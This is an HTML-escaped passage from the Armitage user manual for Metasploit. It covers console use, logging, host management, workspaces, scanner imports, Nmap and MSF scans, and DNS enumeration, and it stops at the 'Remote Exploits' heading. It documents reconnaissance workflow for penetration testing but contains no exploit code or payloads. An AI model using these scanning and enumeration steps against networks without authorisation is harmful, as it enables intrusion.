&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may right-click the&amp;nbsp;X&amp;nbsp;button to open a tab in a window, take a screenshot of a tab, or close all tabs with the same name.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Armitage Tab Management&quot; src=&quot;http://www.fastandeasyhacking.com/images/tabmgmt.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Hold shift and click&amp;nbsp;X&amp;nbsp;to close all tabs with the same name. Hold shift + control and click&amp;nbsp;X&amp;nbsp;to open the tab in its own window.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may drag and drop tabs to change their order.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage provides several keyboard shortcuts to make your tab management experience as enjoyable as possible. Use&amp;nbsp;Ctrl+T&amp;nbsp;to take a screenshot of the active tab. Use&amp;nbsp;Ctrl+D&amp;nbsp;to close the active tab. Try&amp;nbsp;Ctrl+Left&amp;nbsp;and&amp;nbsp;Ctrl+Right&amp;nbsp;to quickly switch tabs. And&amp;nbsp;Ctrl+W&amp;nbsp;to open the current tab in its own window.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.6 Consoles&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit console, Meterpreter console, and shell interfaces each use a console tab. A console tab lets you interact with these interfaces through Armitage.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The console tab tracks your command history. Use the&amp;nbsp;up arrow&amp;nbsp;to cycle through previously typed commands. The&amp;nbsp;down arrow&amp;nbsp;moves back to the last command you typed.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;In the Metasploit console, use the&amp;nbsp;Tab&amp;nbsp;key to complete commands and parameters. This works just like the Metasploit console outside of Armitage.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use&amp;nbsp;Ctrl Plus&amp;nbsp;to make the console font size larger,&amp;nbsp;Ctrl Minus&amp;nbsp;to make it smaller, and&amp;nbsp;Ctrl 0&amp;nbsp;to reset it. This change is local to the current console only. Visit&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Preferences&amp;nbsp;to permanently change the font.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Press&amp;nbsp;Ctrl F&amp;nbsp;to show a panel that will let you search for text within the console.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use&amp;nbsp;Ctrl A&amp;nbsp;to select all text in the console&#39;s buffer.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage sends a&amp;nbsp;&lt;code&gt;use&lt;/code&gt;&amp;nbsp;or a&amp;nbsp;&lt;code&gt;set PAYLOAD&lt;/code&gt;&amp;nbsp;command if you click a module or a payload name in a console.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To open a Console go to&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Console&amp;nbsp;or press&amp;nbsp;Ctrl+N.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;On MacOS X and Windows, you must click in the editbox at the bottom of the console to type. Linux doesn&#39;t have this problem. Always remember, the best Armitage experience is on Linux.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The Armitage console uses color to draw your attention to some information. To disable the colors, set the&lt;em&gt;console.show_colors.boolean&lt;/em&gt;&amp;nbsp;preference to false. You may also edit the colors through&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Preferences. Here is the Armitage color palette and the preference associated with each color:&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Armitage color palette&quot; src=&quot;http://www.fastandeasyhacking.com/images/colors.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.7 Logging&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage logs all console, shell, and event log output for you. Armitage organizes these logs by date and host. You&#39;ll find these logs in the&amp;nbsp;&lt;em&gt;~/.armitage&lt;/em&gt;&amp;nbsp;folder. Go to&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Reporting&amp;nbsp;-&amp;gt;&amp;nbsp;Acitivity Logs&amp;nbsp;to open this folder.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage also saves copies of screenshots and webcam shots to this folder.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Change the&amp;nbsp;&lt;em&gt;armitage.log_everything.boolean&lt;/em&gt;&amp;nbsp;preference key to&amp;nbsp;&lt;code&gt;false&lt;/code&gt;&amp;nbsp;to disable this feature.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Edit the&amp;nbsp;&lt;em&gt;armitage.log_data_here.folder&lt;/em&gt;&amp;nbsp;to set the folder where Armitage should log everything to.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;3.8 Export Data&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage and Metasploit share a database to track your hosts, services, vulnerabilities, credentials, loots, and user-agent strings captured by browser exploit modules.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To get this data, go to&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Reporting&amp;nbsp;-&amp;gt;&amp;nbsp;Export Data. This option will export data from Metasploit and create easily parsable XML and tab separated value (TSV) files.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4. Host Management&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4.1 Host Management&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage displays hosts in the graph and table view. The host icon indicates the best guess about the operating system on the host at the time. This information is taken from the database.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To change the displayed operating system icon for a host, select the host, right-click, and navigate to&amp;nbsp;Host&amp;nbsp;-&amp;gt;&amp;nbsp;Operating System. Choose the correct operating system for the host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may attach a label to your hosts too. Select the host, right-click and go to&amp;nbsp;Host&amp;nbsp;-&amp;gt;&amp;nbsp;Set Label.... Labels are user-specified notes. Armitage stores labels in the database. Labels are visible in both the graph and table view. Labels are shown to all team members. Use labels to track small notes and coordinate actions.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To remove a host, select the host, right-click and go to&amp;nbsp;Host&amp;nbsp;-&amp;gt;&amp;nbsp;Remove Host. This will remove the host from the database.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4.2 Dynamic Workspaces&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage&#39;s dynamic workspaces feature allows you to create views into the hosts database and quickly switch between them. Use&amp;nbsp;Workspaces&amp;nbsp;-&amp;gt;&amp;nbsp;Manage&amp;nbsp;to manage your dynamic workspaces. Here you may add, edit, and remove workspaces you create.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Dynamic Workspaces in Armitage&quot; border=&quot;0&quot; src=&quot;http://www.fastandeasyhacking.com/images/workspacemanage.png&quot; width=&quot;80%&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To create a new dynamic workspace, press&amp;nbsp;Add. You will see the following dialog:&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Dynamic Workspaces in Armitage for Metasploit&quot; border=&quot;0&quot; src=&quot;http://www.fastandeasyhacking.com/images/dynamicworkspace.png&quot; width=&quot;300px&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Give your dynamic workspace a name. It doesn&#39;t matter what you call it. This description is for you.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you&#39;d like to limit your workspace to hosts from a certain network, type a network description in the&amp;nbsp;&lt;em&gt;Hosts&lt;/em&gt;&amp;nbsp;field. A network description might be: 10.10.0.0/16 to display hosts between 10.10.0.0-10.10.255.255. Separate multiple networks with a comma and a space.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You can cheat with the network descriptions a little. If you type: 192.168.95.0, Armitage will assume you mean 192.168.95.0-255. If you type: 192.168.0.0, Armitage will assume you mean 192.168.0.0-192.168.255.255.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Fill out the&amp;nbsp;&lt;em&gt;Ports&lt;/em&gt;&amp;nbsp;field to include hosts with certain services. Separate multiple ports using a comma and a space.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use the&amp;nbsp;&lt;em&gt;OS&lt;/em&gt;&amp;nbsp;field to specify which operating system you&#39;d like to see in this workspace. You may type a partial name, such as indows. Armitage will only include hosts whose OS name includes the partial name. This value is not case sensitive. Separate multiple operating systems with a comma and a space.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use the&amp;nbsp;&lt;em&gt;Labels&lt;/em&gt;&amp;nbsp;field to show hosts with the labels you specify. Armitage treats each word in a host label as a separate label. You may specify any of these labels here. For example, if host 10.10.10.3 has the label dc corp, a workspace defined to show dc or corp labels will include this host. Separate each label with a comma and a space.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Select&amp;nbsp;&lt;em&gt;Hosts with sessions only&lt;/em&gt;&amp;nbsp;to only include hosts with sessions in this dynamic workspace.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may specify any combination of these items when you create your dynamic workspace.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Each workspace will have an item in the&amp;nbsp;Workspaces&amp;nbsp;menu. Use these menu items to switch between workspaces. You may also use&amp;nbsp;Ctrl+1&amp;nbsp;through&amp;nbsp;Ctrl+9&amp;nbsp;to switch between your first nine workspaces.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use&amp;nbsp;Workspaces&amp;nbsp;-&amp;gt;&amp;nbsp;Show All&amp;nbsp;or&amp;nbsp;Ctrl+Backspace&amp;nbsp;to display the entire database.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage will only display 512 hosts at any given time, no matter how many hosts are in the database. If you have thousands of hosts, use this feature to segment your hosts into useful target sets.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4.3 Importing Hosts&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To add host information to Metasploit, you may import it. The&amp;nbsp;Hosts&amp;nbsp;-&amp;gt;&amp;nbsp;Import Hosts&amp;nbsp;menu accepts the following files:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-top: 0px; padding-top: 0px;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Acunetix XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Amap Log&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Amap Log -m&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Appscan XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Burp Session XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Foundstone XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;IP360 ASPL&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;IP360 XML v3&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Microsoft Baseline Security Analyzer&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Nessus NBE&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Nessus XML (v1 and v2)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;NetSparker XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;NeXpose Simple XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;NeXpose XML Report&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Nmap XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;OpenVAS Report&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Qualys Asset XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Qualys Scan XML&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Retina XML&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may manually add hosts with&amp;nbsp;Hosts&amp;nbsp;-&amp;gt;&amp;nbsp;Add Hosts...&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4.4 Nmap Scans&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may also launch an Nmap scan from Armitage and automatically import the results into Metasploit. The&amp;nbsp;Hosts&amp;nbsp;-&amp;gt;Nmap Scan&amp;nbsp;menu has several scanning options.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Optionally, you may type&amp;nbsp;&lt;code&gt;db_Nmap&lt;/code&gt;&amp;nbsp;in a console to launch Nmap with the options you choose.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Nmap scans do not use the pivots you have set up.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4.5 MSF Scans&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage bundles several Metasploit scans into one feature called MSF Scans. This feature will scan for a handful of open ports. It then enumerates several common services using Metasploit auxiliary modules built for the purpose.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Highlight one or more hosts, right-click, and click&amp;nbsp;Scan&amp;nbsp;to launch this feature. You may also go to&amp;nbsp;Hosts&amp;nbsp;-&amp;gt;&amp;nbsp;MSF Scansto launch these as well.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;These scans work through a pivot and against IPv6 hosts as well. These scans do not attempt to discover if a host is alive before scanning. To save time, you should do host discovery first (e.g., an ARP scan, ping sweep, or DNS enumeration) and then launch these scans to enumerate the discovered hosts.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4.6 DNS Enumeration&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Another host discovery option is to enumerate a DNS server. Go to&amp;nbsp;Hosts&amp;nbsp;-&amp;gt;&amp;nbsp;DNS Enum&amp;nbsp;to do this. Armitage will present a module launcher dialog with several options. You will need to set the&amp;nbsp;DOMAIN&amp;nbsp;option to the domain you want to enumerate. You may also want to set&amp;nbsp;NS&amp;nbsp;to the IP address of the DNS server you&#39;re enumerating.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you&#39;re attacking an IPv6 network, DNS enumeration is one option to discover the IPv6 hosts on the network.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;4.7 Database Maintenance&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Metasploit logs everything you do to a database. Over time your database will become full of stuff. If you have a performance problem with Armitage, try clearing your database. To do this, go to&amp;nbsp;Hosts&amp;nbsp;-&amp;gt;&amp;nbsp;Clear Database.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5. Exploitation&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.1 Remote Exploits&lt;/span&gt;&lt;/h2&gt;
